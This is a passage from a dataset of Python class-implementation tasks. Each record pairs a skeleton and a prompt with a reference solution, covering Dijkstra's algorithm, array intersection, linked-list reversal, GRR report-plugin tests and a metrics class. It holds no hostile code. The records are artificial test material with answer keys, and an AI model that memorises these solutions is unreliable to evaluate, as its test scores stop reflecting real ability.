"DijkstrasAlgorithm", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DijkstrasAlgorithm:\n\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n <|body_0|>\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n <|body_1|>\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n <|body_2|>\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing shortest path to the destination from the source\"\"\"\n <|body_3|>\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n heapify(self.nodes_heap)\n<|end_body_0|>\n\n<|body_start_1|>\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n<|end_body_1|>\n\n<|body_start_2|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n<|end_body_2|>\n\n<|body_start_3|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n<|end_body_3|>\n\n<|body_start_4|>\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000313", "length_bytes": 5273, "license_type": "no_license", "methods": [{"docstring": "Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm", "name": "__init__", "signature": "def __init__(self, graph, src, dest)"}, {"docstring": "Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant", "name": "create_nodes_heap", "signature": "def create_nodes_heap(self, graph)"}, {"docstring": "Input: Output: (int) representing shortest distance to the destination from the source", "name": "shortest_distance", "signature": "def shortest_distance(self)"}, {"docstring": "Input: Output: (list) representing shortest path to the destination from the source", "name": "shortest_path", "signature": "def shortest_path(self)"}, {"docstring": "Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:", "name": "build_shortest_path", "signature": "def build_shortest_path(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002042", "prompt": "Implement the Python class `DijkstrasAlgorithm` described below.\n\nClass description:\nImplement the DijkstrasAlgorithm class.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, src, dest): Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\n- def create_nodes_heap(self, graph): Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\n- def shortest_distance(self): Input: Output: (int) representing shortest distance to the destination from the source\n- def shortest_path(self): Input: Output: (list) representing shortest path to the destination from the source\n- def build_shortest_path(self): Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:", "prompted_full_text": "Implement the Python class `DijkstrasAlgorithm` described below.\n\nClass description:\nImplement the DijkstrasAlgorithm class.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, src, dest): Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\n- def create_nodes_heap(self, graph): Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\n- def shortest_distance(self): Input: Output: (int) representing shortest distance to the destination from the source\n- def shortest_path(self): Input: Output: (list) representing shortest path to the destination from the source\n- def build_shortest_path(self): Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\n\n<|skeleton|>\nclass DijkstrasAlgorithm:\n\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n <|body_0|>\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n <|body_1|>\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n <|body_2|>\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing shortest path to the destination from the source\"\"\"\n <|body_3|>\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n heapify(self.nodes_heap)\n<|end_body_0|>\n\n<|body_start_1|>\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n<|end_body_1|>\n\n<|body_start_2|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n<|end_body_2|>\n\n<|body_start_3|>\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n<|end_body_3|>\n\n<|body_start_4|>\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n<|end_body_4|>\n", "revision_id": "933e5db88fc0a19eeb8f78b0e7857cb3ab6a1048", "skeleton": "<|skeleton|>\nclass DijkstrasAlgorithm:\n\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n <|body_0|>\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n <|body_1|>\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n <|body_2|>\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing shortest path to the destination from the source\"\"\"\n <|body_3|>\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DijkstrasAlgorithm:\n def __init__(self, graph, src, dest):\n \"\"\"Input: graph (AdjacencyMatrix) = AdjacencyMatrix to find shortest path/distance src (int): Source node to start search from dest (int): Destination node to end search at Output: DijkstrasAlgorithm\"\"\"\n self.graph = graph\n self.nodes_heap = self.create_nodes_heap(graph)\n self.src = self.nodes_heap[self.nodes_heap.index(src)]\n self.dest = self.nodes_heap[self.nodes_heap.index(dest)]\n self.src.distance = 0\n heapify(self.nodes_heap)\n\n def create_nodes_heap(self, graph):\n \"\"\"Builds a min heap from the AdjacencyMatrix using node distances Input: graph (AdjacencyMatrix) = AdjacencyMatrix to build heap from Output: (list) adhering to min heap invariant\"\"\"\n min_heap = []\n for label, node in self.graph.nodes.items():\n node_container = NodeContainer(node)\n heappush(min_heap, node_container)\n return min_heap\n\n def shortest_distance(self):\n \"\"\"Input: Output: (int) representing shortest distance to the destination from the source\"\"\"\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n return self.dest.distance\n\n def shortest_path(self):\n \"\"\"Input: Output: (list) representing shortest path to the destination from the source\"\"\"\n if self.dest.distance == float('inf'):\n self.build_shortest_path()\n current_node = self.dest\n path = [current_node.label]\n while current_node.previous:\n path.append(current_node.previous.label)\n current_node = current_node.previous\n path.reverse()\n return path\n\n def build_shortest_path(self):\n \"\"\"Actual implementation of Dijkstras Algorithm to get shortest path Input: Output:\"\"\"\n while self.nodes_heap:\n current_node = heappop(self.nodes_heap)\n for node_label, edge_weight in enumerate(current_node.edges):\n if edge_weight and node_label in self.nodes_heap:\n neighbor = self.nodes_heap[self.nodes_heap.index(node_label)]\n if neighbor.distance > current_node.distance + edge_weight:\n neighbor.distance = current_node.distance + edge_weight\n neighbor.previous = current_node\n heapify(self.nodes_heap)\n", "source": "the_stack_v2_python_sparse", "source_path": "algorithms/search/dijkstras_algorithm/dijkstras_algorithm.py", "source_repo": "scottberke/algorithms", "split": "test", "star_events_count": 0} {"blob_id": "9f60fff98431a4911dc8d793b750592448ae60f2", "bodies": ["m = {}\nres = []\nfor i in nums1:\n m[i] = m.setdefault(i, 0) + 1\nfor i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\nreturn res", "nums1.sort()\nnums2.sort()\ni, j = (0, 0)\nres = []\nwhile i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\nreturn res"], "bodies_text": "<|body_start_0|>\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_0|>\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000314", "length_bytes": 2765, "license_type": "no_license", "methods": [{"docstring": ":type nums1: List[int] :type nums2: List[int] :rtype: List[int]", "name": "intersect", "signature": "def intersect(self, nums1, nums2)"}, {"docstring": ":type nums1: List[int] :type nums2: List[int] :rtype: List[int]", "name": "intersectSort", "signature": "def intersectSort(self, nums1, nums2)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def intersect(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]\n- def intersectSort(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def intersect(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]\n- def intersectSort(self, nums1, nums2): :type nums1: List[int] :type nums2: List[int] :rtype: List[int]\n\n<|skeleton|>\nclass Solution:\n\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_0|>\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n<|end_body_1|>\n", "revision_id": "810575368ecffa97677bdb51744d1f716140bbb1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_0|>\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def intersect(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n m = {}\n res = []\n for i in nums1:\n m[i] = m.setdefault(i, 0) + 1\n for i in nums2:\n if i in m and m[i] > 0:\n res.append(i)\n m[i] -= 1\n return res\n\n def intersectSort(self, nums1, nums2):\n \"\"\":type nums1: List[int] :type nums2: List[int] :rtype: List[int]\"\"\"\n nums1.sort()\n nums2.sort()\n i, j = (0, 0)\n res = []\n while i < len(nums1) and j < len(nums2):\n if nums1[i] == nums2[j]:\n res.append(nums1[i])\n i += 1\n j += 1\n elif nums1[i] > nums2[j]:\n j += 1\n else:\n i += 1\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "I/IntersectionofTwoArraysII.py", "source_repo": "bssrdf/pyleet", "split": "test", "star_events_count": 2} {"blob_id": "a6d8364debfbefb661b17e953da60075d6e6892e", "bodies": ["prev = None\nwhile head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\nreturn prev", "if not (head and head.next):\n return head\nres = self.reverseList(head.next)\nhead.next.next = head\nhead.next = None\nreturn res", "if not head:\n return head\nres = ListNode(0)\nwhile head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\nreturn res.next"], "bodies_text": "<|body_start_0|>\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n<|end_body_0|>\n\n<|body_start_1|>\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n if not head:\n return head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions (iteratively and recursively)\"\"\"\n <|body_0|>\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n <|body_1|>\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n<|end_body_0|>\n\n<|body_start_1|>\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n if not head:\n return head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000315", "length_bytes": 1623, "license_type": "permissive", "methods": [{"docstring": "Natural solutions (iteratively and recursively)", "name": "reverseList", "signature": "def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]"}, {"docstring": "recursively", "name": "reverseList1", "signature": "def reverseList1(self, head)"}, {"docstring": "iteratively", "name": "reverseList2", "signature": "def reverseList2(self, head)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]: Natural solutions (iteratively and recursively)\n- def reverseList1(self, head): recursively\n- def reverseList2(self, head): iteratively", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]: Natural solutions (iteratively and recursively)\n- def reverseList1(self, head): recursively\n- def reverseList2(self, head): iteratively\n\n<|skeleton|>\nclass Solution:\n\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions (iteratively and recursively)\"\"\"\n <|body_0|>\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n <|body_1|>\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n<|end_body_0|>\n\n<|body_start_1|>\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n if not head:\n return head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n<|end_body_2|>\n", "revision_id": "49a0b03c55d8a702785888d473ef96539265ce9c", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions (iteratively and recursively)\"\"\"\n <|body_0|>\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n <|body_1|>\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions (iteratively and recursively)\"\"\"\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n if not head:\n return head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode/0206_reverse_linked_list.py", "source_repo": "chaosWsF/Python-Practice", "split": "test", "star_events_count": 1} {"blob_id": "be2f10e3e04444372375cc9c2c48e0cd675760a4", "bodies": ["with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())", "with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)", "desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\nself.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\nself.assertEqual(desc.title, 'Bar Activity')\nself.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\nself.assertEqual(desc.requires_time_range, True)"], "bodies_text": "<|body_start_0|>\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n<|end_body_0|>\n\n<|body_start_1|>\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n<|end_body_1|>\n\n<|body_start_2|>\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ReportPluginsTest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ReportPluginsTest:\n\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n <|body_0|>\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n <|body_1|>\n\n def testGetReportDescriptor(self):\n \"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n<|end_body_0|>\n\n<|body_start_1|>\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n<|end_body_1|>\n\n<|body_start_2|>\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000316", "length_bytes": 34681, "license_type": "permissive", "methods": [{"docstring": "Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.", "name": "testGetAvailableReportPlugins", "signature": "def testGetAvailableReportPlugins(self)"}, {"docstring": "Ensure GetReportByName instantiates correct subclasses based on name.", "name": "testGetReportByName", "signature": "def testGetReportByName(self)"}, {"docstring": "Ensure GetReportDescriptor returns a correctly filled in proto.", "name": "testGetReportDescriptor", "signature": "def testGetReportDescriptor(self)"}], "n_methods": 3, "prompt": "Implement the Python class `ReportPluginsTest` described below.\n\nClass description:\nImplement the ReportPluginsTest class.\n\nMethod signatures and docstrings:\n- def testGetAvailableReportPlugins(self): Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\n- def testGetReportByName(self): Ensure GetReportByName instantiates correct subclasses based on name.\n- def testGetReportDescriptor(self): Ensure GetReportDescriptor returns a correctly filled in proto.", "prompted_full_text": "Implement the Python class `ReportPluginsTest` described below.\n\nClass description:\nImplement the ReportPluginsTest class.\n\nMethod signatures and docstrings:\n- def testGetAvailableReportPlugins(self): Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\n- def testGetReportByName(self): Ensure GetReportByName instantiates correct subclasses based on name.\n- def testGetReportDescriptor(self): Ensure GetReportDescriptor returns a correctly filled in proto.\n\n<|skeleton|>\nclass ReportPluginsTest:\n\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n <|body_0|>\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n <|body_1|>\n\n def testGetReportDescriptor(self):\n \"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n<|end_body_0|>\n\n<|body_start_1|>\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n<|end_body_1|>\n\n<|body_start_2|>\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n<|end_body_2|>\n", "revision_id": "44c0eb8c938302098ef7efae8cfd6b90bcfbb2d6", "skeleton": "<|skeleton|>\nclass ReportPluginsTest:\n\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n <|body_0|>\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n <|body_1|>\n\n def testGetReportDescriptor(self):\n \"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReportPluginsTest:\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n\n def testGetReportDescriptor(self):\n \"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n", "source": "the_stack_v2_python_sparse", "source_path": "grr/server/grr_response_server/gui/api_plugins/report_plugins/report_plugins_test.py", "source_repo": "google/grr", "split": "test", "star_events_count": 4683} {"blob_id": "6639a52fe035376e27d36b6c69b3fa15f564f458", "bodies": ["self.sum_hit_at_one = 0.0\nself.sum_perr = 0.0\nself.sum_loss = 0.0\nself.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\nself.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\nself.pr_calculator = PRCalculator()\nself.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\nself.accumulate_per_tag = accumulate_per_tag\nself.top_k = top_k\nself.num_examples = 0\nself.nums_per_tag = np.zeros(num_class)\nself.tag_corrlation = np.zeros((num_class, num_class))\nself.tag_confidence = np.zeros(num_class)", "batch_size = labels.shape[0]\nmean_hit_at_one = calculate_hit_at_one(predictions, labels)\nmean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\nmean_loss = loss\nself.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\nself.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\nself.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\nself.pr_calculator.accumulate(predictions, labels)\nif self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\nsparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\nself.map_calculator.accumulate(sparse_predictions, sparse_labels, 